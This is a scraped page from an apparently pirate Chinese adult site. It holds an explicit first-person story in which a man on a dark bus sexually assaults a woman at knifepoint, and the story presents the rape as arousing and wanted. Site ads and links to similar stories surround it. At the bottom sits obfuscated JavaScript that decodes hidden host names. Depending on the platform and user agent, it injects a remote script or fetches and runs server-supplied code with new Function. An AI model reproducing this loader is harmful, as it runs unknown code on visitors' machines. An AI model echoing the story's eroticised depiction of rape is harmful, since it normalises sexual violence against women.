返回

公车色狼1d2

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

因为在外地工作,已经很长时间没回家了,真的很想家里的人。于是星期五的晚上7点多,我和佳琪一起坐上长途客车回老家了。车上的座位差不多都坐满了,就剩下客车的最后一排一个男人的左右两边还有两个座位。我和佳琪走了过去想让那个男的靠边一下让我们座在一起,但是那个男的不同意,还说了一些废话。没办法我和佳琪就分开坐下了。我喜欢挨着窗户,就坐在了里边那个男的左面的位置,佳琪坐在了那个男的右边的位置。客车这时开动了,很快汽车就开出了市区向郊区驶去因为中间隔了一个男的,而且女人的话题也不想让男人听到,我和佳琪就没聊天说话。我向佳琪那里看过去,看见佳琪已经靠在座位上累得睡着了。我想都赶了一天的车了,我也应该睡一觉了,而且还得坐3个多小时才到家呢。于是我把窗帘拉过来遮住了车窗户,让脑袋贴着窗帘靠在窗户上闭上了眼睛。这时天渐渐的黑了下来,车里因为有灯却是很明亮。突然车里的灯全部熄灭了。乘客们问司机怎幺回事,由于离的太远我也没听清司机说甚幺,只知道说灯开不了,可能因为灯的甚幺地方的线路坏了,现在也办法去修,只能黑着了。没办法大多数的乘客只好靠在座位上睡觉了。这时车上所有的车窗户窗帘都遮挡了起来,车里一片漆黑,我就只能模糊的看到坐在我傍边座位的那个人,就连佳琪也我也看不到了。我突然困意上来很想睡上一觉,就是觉得车里很凉让我没法睡,我想可能是车里空调给的太大了,但是更让我觉得很凉原因不只是这个,很可能是我自己下身穿的是超短裙,里面除了内裤腿上就只套了现在比较流行的黑色大网丝袜。我用双手抱紧自己的上身,这样我才暖和了一些。过了一会我迷迷糊糊的睡着了。我突然感觉到自己的大腿膝盖处像有甚幺东西在滑动,我用右手去想把那个不知道甚幺的东西弄掉,当我右手触摸到那个不知道是甚幺的东西的时候我却吓了一跳。那东西是一只手,一只男人的手。我顿时睡意全无,我知道我正在被坐在我旁边的男人非礼。我用恶狠狠的眼神看着这个色魔,他用双目迎接我的眼神,但是他却没有一丝退却的意思而且更大胆的向我的短裙里面缓缓摸去。那个色魔男人的手伸进了我的下身超短裙内,快速的摸到了我大腿根部。我先是一个激灵,随后马上想用双手把那色魔男人罪恶的手挪开,但是那个色魔男人的力量却使我没法把他的手挪开。这时那个色魔男人更加嚣张,他的手居然摸到我内裤,还在我的阴部的地方滑动。我实在不能忍受了,我正要站起来大声喊有色魔的时候,那个色魔男人却拿出一把好像水果刀的东西顶在我的腰部,用很轻微只能我们两个人听到的声音说:「小妹妹,是不是想我在你的漂亮脸蛋上划上几刀啊?」我顿时傻了,我知道如果我起身大叫色魔我可能会脱身。但是这时他真的扎我两刀怎幺办?我没有做任何举动,因为我害怕,我害怕他真的在我的脸上划上几刀。试问有几个女孩愿意在这个时候乱动而脸上被划几刀呢。我只好被那个色魔男人随意非礼。令我能好受一点的是我们在车的最后面角落里,车里又很黑没人能够看到我们。那个色魔男人似乎看透了我的心理,更加大胆的把手摸进了我内裤里面。他的手指突然碰到了我阴唇上面,我很本能的叫了一声,但是我不敢大声叫,只用很微弱的声音叫了一声,几乎连我自己的耳朵都不能听得到。我虽然以前和已经分手的男朋友有过几次亲密接触,但是那已经是3年前的事了。现在我被一个陌生色魔男人的手指摸到我的私处虽然很不习惯,但是却很刺激。那个色魔男人把我的裙子和内裤都脱了下来,用手指在我的阴唇部位置来回滑动。很温柔的滑动。我不知道我是不是被这个色魔男人摸出了感觉,居然我的下身自动跟着他手指的频率来回晃动。我忽然感觉得到那个色魔男人应该是个调情高手。我突然想给自己一个耳光,我觉得自己很贱,怎幺会这幺想,他是个色魔,我怎幺被俘虏了呢。但是我还是被那个色魔男人俘虏了,很快我下身就流下了淫水。那个色魔男人收回了他的手很淫笑的看着我轻声说:「妹妹你都湿了,来哥哥帮你舔干净。」我这是才真真切切的看清这个色魔的摸样。那个色魔男人看起来也就30来岁的样子,皮肤比较白净,眼睛也比较大,看起来到是很帅,很斯文。我也不知道我自己怎幺会用帅和斯文来形容那个色魔,我想真的被他给俘虏了。我觉得自己很贱,居然被一个陌生而且还是个超级大色魔的男人给俘虏了,而且我还被他弄出了感觉。这时那个色魔男人很小心翼翼的蹲了下来,嘴向我的阴部靠了过来。可能是怕惊醒他身边的佳琪,那个色魔的动作很是拘谨。我这时能模糊的看到和我搁着一个座位的佳琪,我却不能说出一句话来。我小声呻吟着,那个色魔的舌头在我小穴的里面横行无忌,几乎我阴部里只要他舌头能碰到地方都被那个色魔舔遍了。但是那个色魔似乎没有尽兴,居然狠狠的吸了起来。刚才我的淫水和他唾液组成的水都被那个色魔一点一点吸进了口中。我却没觉得那个色魔很恶心,反而感觉更加强烈,甚至想让那东西进来会……我现在觉得自己是个荡妇,居然很想和那个色魔做爱。我的感觉越来越强烈,我不能控制得住它,它像脱缰的野马似的从我嘴中轻声说出:「哥哥快,我要。」那个色魔脸上露出他把我给俘虏了,而达到了自己的胜利目的,沾沾自喜的淫笑着轻声说:「妹妹不用着急,哥哥马上让你爽翻天。」说完他站到我面前把自己的裤子拉链拉了下来,拿出了他的阴茎。然后将我的双腿抬高,他一只手套弄着自己的阴茎,我看着忍不住的轻声说:「哥哥,来操妹妹吧,妹妹忍不住了。」他一脸淫笑的轻声说:「叫两声老公来听听。」我这时已经甚幺也顾不得了,轻声说:「老公,好老公快操我。」他淫笑着轻声说:「好,我的小美女老婆,老公来插你了。」他把他的阴茎在我阴部前摩擦了几下后突然顶了进来,我本能反映的啊了一声。马上我意思到我的声音太大了,把嘴捂了起来。 我看看佳琪和前坐的人都没甚幺反映才放下心来。但是我手也不敢拿开,把嘴堵得严严的。虽然以前和分手男友做过爱,但是那已经是3年多前的事了。现在的小穴紧紧的,而且他的阴茎很粗大,刚进的时候还是感觉很疼。他可能也感觉到我的小穴很紧,他进的时候我会很疼,所以他刚进的时候特别的慢。他的这个举动让我觉得很体贴,我甚至觉得我不是被强奸了而是和自己的老公在做爱。我想所有的强奸犯都不会这幺体贴吧。他慢慢的开始加速了,我也感觉不太疼了。他的双手抓着我双腿脚脖子处,将我的双腿抬到很高,使他那粗大的阴茎可以完全进入。我这时已经没有了任何痛楚,反而是很强烈的快感。我感觉他的阴茎都要碰到我子宫了,而且还在很快的一下一下顶。他把我双腿放了下来,双手向我的乳房摸了过来。他下面的阴茎还在抽动,上面的双手将我衣扣打开,随后将我胸罩拖了上去。我那少女挺而大的美丽双峰尽显他的眼前。他先用舌头舔着我的乳房,然后嘴力吸着。我感觉他太用力了吸得我有点痛了,我轻声的呻吟着。但是我的感觉却越来越强烈了,我感觉我要高潮了。他松开了嘴,抬头看着我轻声说:「小美女老婆,怎幺样快乐吗?」我没有说话只是点点了头。他又轻声说:「来,我们换个姿势。」他坐在了我的位置上,让我正面坐着对着他。他上面用嘴亲吻着我的乳房,下边双手拖着我的屁股,把阴茎插入我的小穴内开始上下拖动。我突然很想问问他我是不是让他很爽,于是我轻声说:「你爽吗?」他淫笑着轻声说:「当然爽了,你年纪轻,阴道紧。」我一边呻吟一边轻声说:「你结婚了吗?」他却没有那淫笑了而轻声答了一声:「是的。」说完后他却开始加速用力的抽插。我的呻吟声也越来越快。他快速了抽插了一阵后,又让我双手扶着前面座位的后面扶手上,让我把屁股撅起来,然后他跪在了我的座位上把阴茎从后面插入我的小穴。我知道他这是最后的姿势了,我感觉他要射了。而我自己也高潮了。他快速的抽插使我快感起伏我感觉我要飞了起来。我的呻吟声也跟着快了起来,但是怕前面座位的人听到,我把嘴和鼻子都捂得死死的。我感觉自己都快要上不来气了,这时几股热热的精液射到了我的阴道内,他趴在我的身上却没有马上拔出来他的阴茎。过了20多秒他拔出了他阴茎,我把我的纸巾递给了他。他接了过来擦了擦放到了垃圾袋里。我也用纸巾把下身擦了擦,但是还是有些精液流到了我的座位下面。我们都把衣服穿好坐回了原位。之后我们没有说一句话。这时我才想起刚才他精子射入我的体内,我会不会怀孕?就在我考虑是不是要问他的时候他下车了,我没有再看他,就像一场梦,梦也已经醒了。后话:我后来没有怀孕,因为是安全期。过了几年我也嫁为人妇了,这件事永远封存在我的记忆里,永远永远。特此警告少女和所有女人在公交车上要注意谨防色魔!



评分
相关推荐
3.0分

3.0分 我与公车色狼较量697

3.0分

3.0分 狼车712

3.0分

3.0分 公车双狼之母女作者不详490

3.0分

3.0分 公车上的失恋女孩 作者杰~狼7a2

3.0分

3.0分 计程车之狼c90

3.0分

3.0分 狼车-淫妻奸情c72

3.0分

3.0分 校园火车淫狼7b6

3.0分

3.0分 柔道女社长教大家如何防范电车色狼40e

3.0分

3.0分 邓阳遇上*狼列车长d97

3.0分

3.0分 色狼教师b78

3.0分

3.0分 色狼传说96d

3.0分

3.0分 色狼发威c8c

3.0分

3.0分 地铁色狼4ad

3.0分

3.0分 地铁色狼4ad

3.0分

3.0分 色狼发威c8c

3.0分

3.0分 老色狼送给小色狼的40条忠告!50d


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};